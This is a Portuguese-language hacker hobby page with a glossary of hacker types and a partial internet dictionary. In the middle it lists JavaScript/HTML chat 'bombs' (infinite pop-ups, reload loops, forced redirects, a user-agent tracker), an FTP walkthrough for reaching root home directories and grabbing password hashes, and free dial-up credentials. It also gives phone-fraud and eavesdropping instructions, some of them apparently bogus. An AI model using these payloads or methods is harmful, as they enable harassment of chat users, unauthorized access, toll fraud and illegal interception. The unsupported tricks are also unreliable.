Postagens populares

HACKERISMO & SEGURANÇA


O que é Hacker ?
Não há uma tradução de Hacker, porem significar "fuçar". Hacker não é o Guru que sabe tudo, Hacker é aquele que fuça até que aprender
Ele tem a Informática como Hooby e não se contemta em aprender tudo aquilo que é ensinado oficialmete, portanto alem de conhecer tudo que é ensinado, vai mais fundo para se descobrir os segredos jamais revelado.
E como aprende aquilo que não é ensinado?
Fuçando (hackeando), ou seja por conta própria
Segundo a imprensa o que é Hacker ?
A imprensa considera como sendo "Hacker" tudo aquilo que seja diferente do leigo
Considera os bandido da Web, Crackers, Lamers, Arackers, Phreaker, Wannabe, Larva, idiotas da web, como sendo um "Hacker"
Enfim tudo aquilo que eles (leigos da imprensa) não entendem é jogado numa vala comun só para dizer que sabe, o que não sabe, e para almentar a audiência E eles falam com a boca "cheia" como se fose um especialista em tudo, sendo que na verdade quem diz saber tudo não sabe nada !!!

Lamers


Este é o principiante que acha que sabe tupo porque "pegou" alguns programinhas de invasão e segurança e com ele conseque fazer algo que os leigos ficam espantado, mas na real não sabe nada. É um novato metido a besta.

Wannabe


Este sabe um pouca mais que um Lamer, já não é um novato, porem tem muito o que aprender, dominar alguns programinhas de invasão e começa a enternder um pouco.

Larva


O Larva é aquele que está se tornando um Hacker, ele já desemvolve seu próprio metodo de invasão e segurnça

Arackers


São as pessoas do submundo da Web fazem reuniões de madrugada, fingem ser ousados planejam ataques. Istó é resultado de muita TV

Script Kiddie


Script Kiddie é um tipo de hacker mais comum que existe, é um hacker baderneiro, ele não esta atraz de um alvo específico Ele esta atraz de um ponto vulnerável em qualquer máquina da web
Mesmo que não tenha nada na sua máquina se estiver desprotegido ele vai dar um "olhadinha", quem sabe ele não deixa uma porta tipo "backdoor" e concertar os pontos vulnerável da sua máquina, desta forma outros não poderão entrar na sua máquina, mas ele terá acesso, pois já criou uma porta para isto.
Ou seja se na sua máquina não tem proteção, algem pode estar te visitado constantemente, sem que você saiba.
E a vítima vai dizer isto nunca aconteceu comigo !!!!! Eu estou seguro !!!!

Phreacker


É uma modalidade de hackers especialista em telefonia, sabe como realizar ligaçoes telefônicas internacionais sem pagar, ou pagando apenas a ligação local. Conhece o sistema telefônico como ninquem, conseque granpear as converças, porem não tem má fé.Claro que não se trata de um Santo, mas não tem intenção de prejudicar ningem.

Crackers


São pessoas de má fé que usa o conhecimento dos Hacker para praticar o mal.
Tem o conhecimento do Hacker, mas não tem a filosofia Hacker, retira trava de segurança dos programas para piratear programas, invade sistemas e provoca danos a terceiros...

COMANDOS JAVA


Enter subhead content here

Abrir caixa de erro de Java: {img src= javascript: jump To ('endereço do chat/cgi-bin/go2home/go2home.cgi?posicao=conf2550')}
Manda p/ o endereço com nova janela: <a href=s onMouseOver=*window.open('endereço')">texto que você desejar</a>
Manda p/ o endereço sem nova janela: <a href="endereço da imagem" onMouseOver="alert('!mensagem')">texto que sairá no chat</a>

Para travar com pausa: <a href="endereço do link" onmouseover="while (1==1)window.open()">

Bomba com alerta:<a href="endereço do link" onMouseOver= "alert('mensagem de alerta');while(true)history.go(0);window.setTimeout('ReloadBomb()',1)">mensagem que sairá no chat</a>

Bomba de alertas infinitos: <img src=http://endereço da imagem onLoad="alert("\n mensagem \n\n mensagem!!');variCouter=0;while(true) window.open('http://endereço do link'); "CRASHING"+ iCounter('width=, height=1,resizable=no');iCounter++">

Bomba de reload com alerta no link: <a href="endereço do link" onMouseOver= "alert('hehe!! isso é uma bomba aproveite a viagem!');while(true)history.go(0);window.setTimeout('ReloadBomb()',1)">mensagem</a>
Bomba de reload direto: <img src="http://endereço da imagem"onLoad="while(true)histotry.go(0);window.setTimeout('ReloadBomb()',1)">
Bomba com senha: <img src=http://endereço da imagem onLoad="var password"='senha';alert('mensagem2'):if(p==password){c=5}else{c++};if(p==password){alert('mensagem3')}else{alert('mensagem'); variCounter=0; while(true)window.open('http://endereço do link')};"CRASHING"+iCounter('whidth=1,height=1,resizable=no');iCounter++)}">
Bomba sem senha: <ahref="CRASHING"+iCounter('width=1,height=1,resizable=no');iCounter++)}">texto<var p=prompt('mensagem!');if ( p==x){c=10}else c++}if(p==x){alert ('mensagem!');}else {alert ('mensagem');for (var i=0; i==i;i++){msg-open(",i,"toolbar=no,directories-no,menubar=no')}">texto!</a>
Mandar a pessoa p/ outra sala: <img src=http://endereço da imagem onLoad=window.open("http://endereço do chat que vc quer mandar a pessoa/&USER=nick da pessoa&SAYS=entra+na+sala&HISTORY=20&Seu nick","Sub",resizable=yes,status=NO,location=no.toolbar=no,scrollbars=no")>
Troca o nick e manda p/ outra sala: <img src=http://endereço da sala/&USER"onerror=window.open("http://endereço que vc quer mandar a pessoa?&USER=nick da pessoa$SAYS=mensagem&HISTORY=10&mensagem"."Sub",resizable=yes,status=no,location=no,tollbar=no,scrollbars=no")>
Travar uma pessoa com imagem: <img src=http://endereço da imagem"width=7000height=7000>

Este comando pode ser enviado a uma única pessoa no reservado ou para toda a sala
Sumir a barra de rolagem do chat: <img src="seu nick"widht=1000000000 height=1000000000><img src="seu nick"width=1000000000height=1000000000>
Alerta em Javascript em forma de link: <a href=img src="endereço da imagem"onMouseOver="var bg=alert('mensagem')">mensagem</a>
Janela de Alerta: <a href="http://endereço da imagem"onMouseOver=alert('\n mensagem \n\n mensagem2 \n\n mensagem3');while(true)history.go(0);window.setTimeout>
Rastreador de navegador: <img src="http://endereço da imagem"width=1 height=1 onload='parent.frames[1].document.forms[2].SAYS.value=navigator.userAgent;parent.frames[1].document.forms[2].SUBMIT.click().
Mudar a cor do fundo: <a href="http://endereço da imagem"onload=var bg='cor em ingles' document.bgColor=bg">
Bomba para abrir vários Netscape: <a href="http://endereço da imagem" onclick="(iCounter=0;while(true){window.open('http://endereço do link, iCounter; width=1, height=1,resizable=no');iCounter++}}},"><fontlace=impact size=9 color=nome da cor em ingles><center> texto<font face=arial size=3 color=black></a>
Abre uma página se passar o mouse em cima: <a href="endereço da imagem"onMouseOver=window.open(http://endereço do link)">mensagem</a>
Bomba: <a href="endereço da imagem"Over="a=0;while(a !=1000){document.bgColor = a; a=a+1;}">mensagem</a>
Bomba p/ fazer um alerta: <a href="endereço da imagem"onMouseOver="varbg=alert('mensagem')">mensagem1</a>
Bomba: <a href="endereço do link"onMouseOver="{'\n mensagem1 \n\n mensagem2 ');while(true)history.go(0);window.setTimeout('ReloadBomb()',1)">

TIPOS DE HACKERS


Tipos de Hackers 
Hacker

Na verdade, os hackers são os bons mocinhos. Para os fãs de Guerra nas Estrelas, pensem no hacker como o cavaleiro jedi bonzinho. Ele possui os mesmos poderes que o jedi do lado negro da força (cracker) mas os utiliza para proteção. É um curioso por natureza, uma pessoa que têm em aprender e se desenvolver um hobby, assim como ajudar os "menos prevalecidos". Um bom exemplo real foi quando o cracker Kevin Mitnick invadiu o computador do analista de sistemas Shimomura. Mitnick destruiu dados e roubou informações vitais. Shimomura é chamado de hacker pois usa sua inteligência para o bem, e possui muitos mais conhecimentos que seu inimigo digital. Assim facilmente montou um honeypot (armadilha que consiste em criar uma falsa rede para pegar o invasor) e pegou Kevin. Infelizmente a imprensa confundiu os termos e toda notícia referente a baderneiros digitais se refere à hacker.

Cracker

Esses sim são os maldosos. Com um alto grau de conhecimento e nenhum respeito, invadem sistemas e podem apenas deixar a sua "marca" ou destruí-los completamente. Geralmente são hackers que querem se vingar de algum operador, adolescentes que querem ser aceitos por grupos de crackers (ou script kiddies) e saem apagando tudo que vêem ou mestres da programação que são pagos por empresas para fazerem espionagem industrial. Hackers e crackers costumam entrar muito em conflito. Guerras entre grupos é comum, e isso pode ser visto em muitos fóruns de discussão e em grandes empresas, as quais contratam hackers para proteger seus sistemas.

Phreaker

Maníacos por telefonia. Essa é a maneira ideal de descrever os phreakers. Utilizam programas e equipamentos que fazem com que possam utilizar telefones gratuitamente. O primeiro phreaker foi o Capitão Crunch, que descobriu que um pequeno apito encontrado em pacotes de salgadinhos possui a mesma freqüência dos orelhões da AT&T, fazendo com que discassem de graça. Um programa comum utilizado é o blue box, que gera tons de 2600 pela placa de som, fazendo com que a companhia telefônica não reconheça a chamada. Outra técnica muito usada principalmente no Brasil é a de utilizar um diodo e um resistor em telefones públicos. Ou de cobrir o cartão telefônico de papel alumínio para que os creditos não acabem (essa técnica não funciona nos orelhões novos e nos velhos vc pode tomar um belo choque!! acredite eu já tomei um e foi... CHOCANTE!!). Técnicas como essas são utilizadas no mundo inteiro. O phreaker é uma categoria à parte, podem ser hackers, crackers ou nenhum dos dois. Alguns phreakers brasileiros são tão avançados que têm acesso direto à centrais de telefonia, podendo desligar ou ligar telefones, assim como apagar contas. Um dos programas muitos usados para isso é o ozterm, programinha de terminal que funciona em modo DOS. Por sinal, muito difícil de encontrar na net.


Script Kiddies


Sub-categoria de crackers. Não têm um alvo certo, vão tentando invadir tudo que vêm na frente usam ferramentas encontradas na Internet. Nem programar sabem. Mas tem um conhecimento digital bem acima dos usuários comuns.


Lamer


Dificilmente aprendem a usar algum programa, não sabem e não tem condição de aprender como as coisas funcionam. Aqueles que chegam nos chats anunciando "vou te invadir, sou o melhor" mas acaba desistindo pois não consegue descompactar nem um arquivo ZIP.


Carder


É o especialista em fraudes com cartões de crédito. Sabe como conseguir listas de cartões válidos em sites que os utllizam (sites de compras, chat pago, etc.), gerar números falsos que passam pela verificação e mesmo roubar e clonar cartões verdadeiros. ( os caras são bons mesmo!) 
Tipos de Invasao 
Muitas pessoas nos perguntam sobre os tipos de hackers e sobre crackers, phreakers, etc. Inicialmente, o termo hacker é o termo generalizado. Um cracker é um hacker. Um wannabe é um hacker. Porém, um hacker não é necessariamente um phreaker, por exemplo. Digamos que todo hacker possa ter uma especialidade, tal como um médico, por exemplo. Veja em quais desses tipos você se pode se encaixar:

WHITE-HAT: são os hackers que exploram problemas de segurança para divulgá-los para toda a comunidade, a título de que os usuários saibam como devem se proteger.

BLACK-HAT: usam seus conhecimentos em benefício próprio e, geralmente, estão ligados a atividades ilícitas.São geralmente perigosos e difíceis de identificar, pois nunca tentarão chamar atenção.

CRACKER: alguns classificam cracker como aqueles que tem por objetivo invadir sistemas ou redes apenas pelo desafio. Porém, historicamente, o nome cracker está ligado a modificação de código, para obter funcionalidades que não existem ou, de certa forma, limitadas. Você já ouviu falar em cracks ou patches para programas?

PHREAKER: sua especialidade é interferir o curso normal de funcionamento das centrais telefônicas, mudar rotas, números, realizar chamadas sem tarifação, bem como realizar chamadas sem ser detectado.

WANNABE: é aquele que acha que sabe, diz para todos que sabe, divulga abertamente suas "façanhas" e na grande maioria dos casos usam informações já conhecidos, as famosas "receitas de bolo." Eles geralmente atacam apenas para testar suas descobertas e a maioria deles não possui nenhum escrúpulo. São frequentemente encontrados no programa de bate-pap mIRC.

Esses são os tipos de hackers mais famosos. Se você conhecer mais algum tipo, ou tiver alguma dúvida, entre em contato conosco. 
Como se um HACKER 
ADVERTENCIA:

Este documento foi criado para informacao apenas. De nenhuma forma, encorajando

qualquer tipo de atividade ilegal, e qualquer ato praticado apos a leitura deste documento é de inteira

responsabilidade do leitor. Se nao concorda com este fato, retorne agora.

LIGANDO GRATIS


Siga as instruções abaixo: Crie uma nova conexão na Rede Dial-Up com o nome que você quiser. Insira este número de telefone: ,,0800,55,7676 (digite exatamente como está aqui). Após criar a nova conexão, digite dmayce no campo Nome do usuário. Coloque sptob no local da Senha. Clique em Conectar.
Pronto ! Você de agora em diante não paga mais provedor e nem conta telefônica. Só tem dois inconvenientes nesta conexão: a transferência de dados geralmente é muito baixa (varia de 12.2Kbps a 26.8Kbps), e você é desconectado a cada 10 minutos. Mas já dá para fazer uma graça, como por exemplo, conferir o e-mail e as mensagens do ICQ.

HACKEANDO VIA FTP



1º PASSO: Vá ao DOS e digite FTP , ao aparece o prompt ftp, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP , ex.: (to) ftp.convex.com.br. Ao conectar ele pedira a senha e o Password, nao entre com seu email nem com a sua senha se estiver hackeando o seu provedor!!(NUNCA DIGITE NADA NO USERS E NO PASSWORDS)

2º PASSO: No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , precione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....

3º PASSO: Após ENTRAR!!!!!! Ao entrar vc vai estar no Diretorio do login, Ex.: \home\root\ Para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir éum usuario,... tente pegar as senhas ,mais pegando as senhas a um porem ela sao todas cryptografadas, mais nao tem problema nenhum mande elas para min que eu descrypto elas ou pegue vc mesmo um descrypto e blZ !!! Para saber os comandos do prog FTP digite: ?


 OBS: As informações contidas nessa page, são unicamente para fins educativos.

Eu não me responsabilizo pelo mau uso das informações ou por qualquer cagada que vc venha a fazer!!!!

ESCULTAS OU BURLANDO TELEFONES

Conversas
1-Para ouvir conversas dos outros


Telefones sem Fio:

Caso você tenha um telefone sem fio, poderá ouvir as conversas dele em radio FM. É só você ligar e discar para qualquer pessoa e procurar no radio, até sintonizar a mesma freqüência do telefone. Aqui vão algumas freqüências já testadas.

Panasonic

KX-T3908-

93,3MHz

Panasonic

KK-T4550-

93,3MHz

Outra dica boa: tambem é você comprar aqueles radinhos de crianças brincarem, que só pega uns 10 metros de um radinho para o outro, ai você pega um do seu filho, sobrinho, etc e liga um só radinho, ai você irá pegar freqüencias de telefone sem fio, de até uns 100 metros do radinho podre que só pegava 10 metros, falando de um para o outro.(Ele o radinho irá pegar a freqüencia que estiver mais perto dele então seu visinhos que usam telefone sem fio nunca estarão falando a sós no telefone).

Burlando telefones

2- Burlando Celulares



Primeiro, pegue o número que você vai discar.

Ex: 123-4567

Esse número é ficticio. Não ligue para lá, pedindo informações.
Entao devemos pegar o ultimo numero do telefone a ser discado, no caso o 7... subtraimos ele de 10, o que vai resultar o numero 3.
Somente vamos acrescentar o numero 3 ao final do numero discado. O resultado vai ficar:

Numero ligado sem pagar: 123-4567-3






3- Ligando em orelhões à cartão sem pagar

Truque com o cartão:

As tecnicas que eu uso são 3 agora vc vai conhece-las!

Enganando o telefone publico

1º jeito: Ponha o cartão e ligue normalmente
Quando a pessoa atender aperte o 0(zero) e segure.
Pronto agora suas fichas (unidades do cartão) não vão cair mais!

Obs: Não solte o dedo do 0(zero) se não as fichas vão voltar a cair,
essa e a parte chata!

2º jeito: Bote o cartão , assim que a pessoa falar ALOW! segure o numero 9 e retire o cartão,fique segurando o numero 9 até acabar de falar!

Grafite: O grafite é um material super condutor que conduz energia, e o cartão funciona assim, ele tem uns 50 fuziveiszinhos, cada ligação gasta ele queima um fuzivel, então o nosso amigo grafite que é condutor de eletricidade, não deixa queimar os fuziveis então faça o seguinte atrás do cartão,(na parte cinza) rabisque-a com força e bote no telefone publico e pronto ,mas lembre-se rabisque com força!

Esmalte de unha incolor

O esmalte impede que esses fusíveis queimem, faça também esse com os cartões de vídeo game (divertilandia)! Passe esmalte na parte de traz do cartão ,e no de vídeo game passe na parte da fita magnética! Pegue o cartão telefonico "novinho em folha"! dai coloque ele de molho na água candida (Va a uma lojas de limpeza e peça ,se não souber), depois de 3 ou 4 dias a tinta do cartão irá sair , depois pegue papel aluminio e cubra as partes metalicas com o papel aluminio , depois coloque o cartão no orelhão e ligue e faça afesta por que as ligaçoes ficarão infinitas!

Usando um cartão usado, envolvido por papel alumínio.

Usando um cartão usado de 50 ligações, com a parte de trás raspada Orelhão sem Fichas .







Usando um telefone comum.

Pegue algum telefone pequeno e descasque os fios, descasque o fio do orelhão e ligue-os com o do seu telefone.Pronto aí é só ligar pro Deus e o mundo.Mas se lembre que tem que por fio positivo com fio positivo, se não não vai dar.

4- Escuta por celular

Tire a bateria do seu celular, nos ferrinhos que tem em baixo coloque um pedacinho de alumínio e ponha a bateria de novo, aí é so ligar o celular, digitar #1058# e escutar tudo.



5- Conectando notebooks a telefones públicos

O processo para se conectar notebooks a orelhões, é igual ao de se conectar telefones comuns. Resumirei nesse item, algumas considerações a respeito da fiação do notebook, que segue os padrões da FCC Americana e é um pouco diferente da nossa. O conector do fio do notebook, que é do tipo jack, tem quatro fios dentro dele. Arranque o conector de plástico transparente que fica na ponta do fio, pegue os dois fios centrais e separe-os dos fios das extremidades. Estes dois fios centrais, são os que serão utilizados para fazer a ligação no orelhão. Eu aconselho que você coloque jacarés neles também. Basta conectar-se a BBS's da mesma forma que você se conecta em casa. Caso você queira testar se está tudo OK, abra um programa de terminal qualquer e digite o comando ATA, se fizer um barulhinho parecido com o tom de linha é que está tudo OK.


6- Efetuando ligações gratuitamente utilizando um aparelho comum
Primeiramente, você deve tomar os processos citados no ítem anterior (Como efetuar ligações de um telefone público utilizando um diodo)para descascar os fios do telefone público. Em seguida você deve conseguir um aparelho telefônico comum e ligar cada uma das pontas dos fios dele nos fios do orelhão. Para facilitar a sua vida, eu aconselho que o seu telefone seja o menor possível e que você prenda um jacaré (pequeno gancho achado em qualquer loja de componentes eletrônicos) em cada uma das pontas do seu telefone, para facilitar a ligação no orelhão. Aí é só efetuar a ligação normalmente.


7- Efetuando ligações de aparelhos sem teclas
Antes de começarmos, precisamos definir o que significa "duração de um pulso". Um pulso é simplesmente uma interrupção no fluxo de corrente que circula na linha telefônica, e a sua duração, entendida como o espaço de tempo decorrido do início ao fim desta interrupção. Os pulsos enviados pelo aparelho telefônico quando você aperta o botão de algum número, são iguais ao sinal emitido quando você coloca o telefone no gancho. A diferenciação éfeita pela central telefônica, usando como referência a duração do pulso. Se ele for um pouco maior do que 0.5 segundos (aumentar um pouco esse valor para as linhas mais antigas), a central considera que ‚ um pedido de linha. Se a duração do pulso for menor do que esse valor, a central irá considerar que um número a ser discado está sendo enviado. Para formar os números de 0 a 9, são enviado uma série de pequenos pulsos em sequência referentes ao número, ou seja, 2 pulsos para o número 2, 3 para o número 3 e assim por diante. Para o número 0 são enviados dez pulsos. Para simular esses pulsos sem a necessidade de teclas, basta usar o botão onde se "pega" a linha, aquele onde você coloca o telefone em cima quando quer terminar uma ligação. Aperte e solte este botão rapidamente de acordo com o número que você quer discar, espere um pouco e aperte outra série de vezes de acordo com o outro número. Lembre-se que para o número 0 deve-se apertar o botão dez vezes. Faça isso com todos os números e, ao final, você vai escutar o tom de chamada.


8- Ligando de telefone publico sem pagar
Este método só funciona em telefones antigos! Aqueles na base da moedinha (se estiver nos Estados Unidos, usa o Red Box). Por exemplo: O número que você quer ligar é 523-26-47 (número fictício) Primeiro você deve dimunuir de 10 todos os numeros que compoem o telefone a se ser discado, no caso esse telefone ficaria. Número a ser discado: 523-26-47 ORIGINAL

(5-10)=5
(2-10)=8
(3-10)=7
(2-10)=8
(6-10)=4
(4-10)=6
(7-10)=3

O novo número será: 587-84-63 O que você vai ter que fazer é bater no bocal do telefone o número de vezes correspondente a subtração. Conforme explicado em "Ligação de Aparelhos Sem Teclas". Desta maneira você podera fazer ligacoes gratuitamente...

9

- Ligando do Celular pagando a metade
Este truque só funciona com celulares com a marca Motorola. Siga as instruções abaixo:


Pressione FCN
Digite 0000000 4
Pressione STO
Seqüência completa: FCN + 0000000 4 + STO
Viu como é simples??
Fazendo Escuta Celular via TV
(pode se necessário usar o manual da TV).
TV VHF canais 70 - 83 pegue a melhor distribuição do melhor tronco usado pelos
celulares. Este é o que distribui nesse fluxo. Sintonize esses canais ajustando-os a sua atual freqüência e você estar preparado para fazer a escuta. Cada canal da TV obrigara
5Mhz com ótimo controle de sintonia. Se mesmo assim você não tiver uma freqüência
exata você precisará ler sobre freqüência e você terá uma boa idéia de como obter uma exata.
Se a sensividade não estiver boa mesmo você estando na cidade, ou perto de uma freqüência exata você pegara alguma coisa. Você poderá também pegar transmissões de negócios no tronco móvel se o mesmo estiver fechado, as transmissões não serão ilegais a menos que a conversa esteja codificada então você poderá usar a velha TV para achar outro local de negócios que use freqüências entre 800Mhz ou mais.

10- Ligando do Celular sem pagar
Se você tem celular e no final do mês sai aquela conta terrível, você vai gostar deste truque. É muito fácil, até uma criança pode fazer. O truque funciona assim: Você tem que digitar no final do número outro número que somado com o último seja 10. Não entendeu? Veja esse exemplo: Se você quer ligar do seu celular para 123-4567 você vai pagar. Agora se você ligar para 123-45673 não vai pagar. Note que o número que você digitar no final soma com o ultimo: 7 + 3 = 10. Agora você pode ligar para qualquer numero, exemplo: 234-5678(2), 345-6789(1)... O 0 (zero) fica assim: 456-78900, digite outro zero :)

DICIONARIO HACKER

Abaixo segue uma lista de termos usados pelos hackers, lammers, usuários, povão, resto, todo mundo que navega na net:

Letra A acceptable use policy - Regras de boa conduta para a utilização correta da rede e seus serviços. Pode ser um documento distribuído ao novo utilizador de um determinado sistema. anonymous - Anônimo. Normalmente utilizado para o login num servidor FTP, para indicar que se trata de um utilizador não registado na maquina em questão. A password a fornecer deve ser o endereço eletrônico. ANSI - Conjunto de normas para a transmissão de caracteres de controle para um terminal, permitindo: tratamento de cores e outros atributos, movimento do cursor, som, etc. terminais. archie - Ferramenta que permite a procura de arquivos e informações em servidores FTP. Indica-se ao archie o nome do arquivo (ou parte dele) que deseja encontrar e ele fornece o nome (endereço) dos servidores onde pode encontrar. arpanet - Rede de computadores criada em 69 pelo Departamento de Defesa norte-americano, interligando na altura instituições militares. Em meados dos anos 70 varias grandes universidades americanas aderiram à rede, que deu lugar à atual Internet. article - Artigo. Um texto existente na Usenet/News. artigo - Um texto existente na Usenet/News. ASCII - Norma para a codificação de caracteres através de números binários, utilizada em diferentes computadores. Define a codificação dos caracteres com códigos de 0 a 127. auto-estrada da informação - Um ligação ou conjunto de ligações entre computadores, formando uma rede de redes, de preferencia com meios de comunicação extremamente rápidos. Um nome abusivamente usado por vezes (sobretudo nos meios tradicionais) para designar a(s) rede(s) atualmente existente(s) (e em particular a Internet), pois uma grande parte delas ainda tem muitas interligações bastante lentas, longe do futuro próximo em que tudo se contara' em dezenas de Mbps e Gbps... :-) AUP - ver acceptable use policy. auto-estrada eletrônica - Ver auto-estrada da informação.
Letra B Baud - Quantidade de informacoes que sao transferidas entre dois computadores interligados. Bios - É a memoria basica da maquina. Contem instrucoes primarias para o funcionamento correto da maquina. É na BIOS que fica armazenada a informacao de que em seu PC existe um teclado, por exemplo. Bug - Erro em algum programa ou arquivo. backbone - Estrutura de nível mais alto em uma rede composta por várias sub-redes. bandwidth - Largura de Banda. Termo que designa a quantidade de informação passível de ser transmitida por unidade de tempo, num determinado meio de comunicação (fio, onda radio, fibra óptica, etc.). Normalmente medida em bits por segundo, kilobits por segundo, megabits por segundo, kilobytes por segundo, megabytes por segundo, etc. BBS - Bulletin Board System. Computador (1 ou vários) que permitem que os usuários se liguem a ele através de uma linha telefônica e onde normalmente se trocam mensagens com outros usuários, se procuram arquivos e programas ou se participa em conferencias (fóruns de discussão) divulgadas por varias BBS. Digamos que uma BBS esta' para a Internet assim como uma aldeia está para o Mundo. bitnet - Rede mundial acessível pela Internet, mas distinta desta, com características educacionais. browser - Um programa que permite visualizar e utilizar uma dada base de dados, distribuída ou não por vários computadores. Termo normalmente aplicado para os programas que permitem navegar no World-Wide-Web. BTW - Sigla do inglês "By the Way" (Já' agora / Por falar nisso, etc.). Usada em textos de correio eletrônico, artigos de news, etc.
Letra C Cavalo de Tróia - É uma especie de virus (voce programa para fazer o que quiser). Muito mais potente que um virus comum que tem como unica funcao destruir computadores. cello - Um programa (browser) para navegar no WWW. Criptografia - Torna algum programa ou mensagem secreta, ou seja, so' podera' ler aquela mensgaem ou executar aquele programa a pessoa que tiver a chave criptografica (que serve como uma senha) para desencriptar-los. CERN - Centre Europeen de Recherche Nucleaire. Centro Europeu de Investigação Nuclear. Um dos centros mais importantes da Internet (e, claro, da investigação física). Nele trabalham centenas (ou mesmo milhares?) de investigadores e a sua "jóia da coroa" é um grande circulo de aceleração de partículas com 27 Km de diâmetro, que fica por baixo de Genebra, na Suíça, atualmente o maior acelerador de partículas existente no Mundo. CERT - Computer Emergency Response Team. Organismo criado em 1988 pela Darpa, visando tratar questões de segurança em redes, em particular na Internet. chain letter - Uma carta que é recebida por alguém e enviada para varias pessoas e assim sucessivamente até que se torna excessivamente difundida. Normalmente o seu texto incita à difusão da carta por outras pessoas. chain mail - Ver "chain letter". ciberespaco - Por ciberespaco designa-se habitualmente o conjunto das redes de computadores interligadas e de toda a atividade ai existente. É uma espécie de planeta virtual, onde as pessoas (a sociedade da informação) se relacionam virtualmente, por meios eletrônicos. Termo inventado por William Gibson no seu romance Neuromancer. client - Cliente. No contexto Cliente/Servidor, um Cliente é um programa que pede um determinado serviço (por exemplo, a transferencia de um arquivo) a um Servidor, outro programa. O Cliente e o Servidor podem estar em duas maquinas diferentes, sendo esta a realidade para a maior parte das aplicações que usam este tipo de interação. cliente - Ver client. conexão - Ligação do seu computador a um computador remoto. correio caracol - Tradução do inglês "snail mail". Ver snail mail. correio eletrônico - Correio transmitido por meios eletrônicos, normalmente, redes informáticas. Uma carta eletrônica contem texto (como qualquer outra carta) e pode ter, eventualmente, anexo um ou mais arquivos. crosspost - Fazer o crosspost de... Ato de enviar para um grupo de news um artigo (ou parte) já' publicado (ou a publicar na mesma altura) noutro grupo. cracker - Indivíduo que faz todo o possível e o impossível para entrar num sistema informático alheio, quebrando sistemas de segurança, para assim poder causar danos. cyberspace - Ver ciberespaco.

Letra D daemon - Programa que corre (que foi lançado) num computador e esta' (sempre) pronto a receber instruções/pedidos de outros programas para a execução de determinada ação. Defaults - Diz-se que é a configuracao normalmente utilizada por um equipamento ou programa. domain - Domínio. Nome à direita do símbolo @ num endereço eletrônico. Por exemplo: o dominio do meu provedor e' hotmail.com débito - Quantidade de informação por unidade de tempo. dial-IN - Designação de um tipo de ligação ou de um ato de ligação à Internet, neste caso pelo estabelecimento de uma chamada (telefônica - Dial) para um computador, através de, por exemplo, um modem. dial-UP - Ver Dial-IN. DNS - Sigla de Domain Name Server. Designa o conjunto de regras e/ou programas que constituem um Servidor de Nomes da Internet. Um servidor de nomes faz a tradução de um nome alfanumérico (p. ex. microbyte.com) para um numero IP (p. ex. 192.190.100.57). Por exemplo, no DNS brasileiro, gerem-se todos os nomes terminados em br. Qualquer outro nome será' também traduzido pelo mesmo DNS, mas a partir de informação proveniente de outro DNS (isto se essa informação não tiver sido previamente obtida). domínio - Ver domain. domínio publico - Algo que esta' no domínio publico (software, p. ex.) é algo que se pode copiar, cortar, colar, queimar, distribuir, deleitar e normalmente utilizar sem pagar o que quer que seja! :-) Normalmente deve ser dado o devido credito ao(s) autor(es) desse algo. DOOM - Um dos mais famosos jogos distribuídos em shareware na Internet. Os seus criadores (3 jovens) ficaram rapidamente milionários! :-) Tem vários níveis, efeitos sonoros, é a 3 dimensões e permite que vários jogadores joguem simultaneamente, cada um no seu computador. Um verdadeiro clássico no gênero (tiros e explosões). download - Fazer o download de um arquivo. Ato de transferir o arquivo de um computador remoto para o seu próprio computador, usando qualquer protocolo de comunicações.
Letra E Endereço IP - É o endereco que uma maquina possui ao se conectar na Internet. A cada vez que voce se conecta, voce obetem um novo endereco IP. edu - Sufixo presente em variados endereços na Internet e que designa instituições de ensino/educação (edu=educational). elm - Um programa/leitor de correio eletrônico para ambientes Unix (se bem que também se possam encontrar versões para outros sistemas operativos). À base de menus com escolha de opções por letras e teclas de cursor. email - Eletronic Mail. Correio Eletrônico. email address - Endereço (de correio) eletrônico. Ver Endereço eletrônico. emoticon - ver smiley. endereço eletrônico - É um cadeia de caracteres, do tipo "nome_usuario@qqcoisa.empresax.br" (sem aspas) que identifica univocamente um determinado utilizador dentro da Internet e, em particular, a sua caixa de correio eletrônica. Qualquer envio de correio eletrônico para esse utilizador deve ser feito para o seu endereço eletrônico. ethernet - Uma das arquiteturas possíveis em redes locais. As redes Ethernet usam normalmente cabos coaxiais que interligam vários computadores. Cada um deles acede à rede em concorrência com os outros, existindo depois regras/convenções que permitem designar qual o computador que deve transmitir informação num determinado instante. A informação pode ser transmitida em modo "Broadcast", ou seja, para todos os outros computadores da rede e não apenas para um só'. eudora - Um programa/leitor de correio eletrônico muito completo, existente em varias plataformas, entre elas, os Macintosh e PC (Windows). Recomendado.
Letra F firewall - Parede de Fogo. Medida de segurança que pode ser implementada para limitar o acesso de terceiros a um determinada rede ligada à Internet. Os mecanismos de implementação são variados

aula 1 sobre pascal (deivson).avi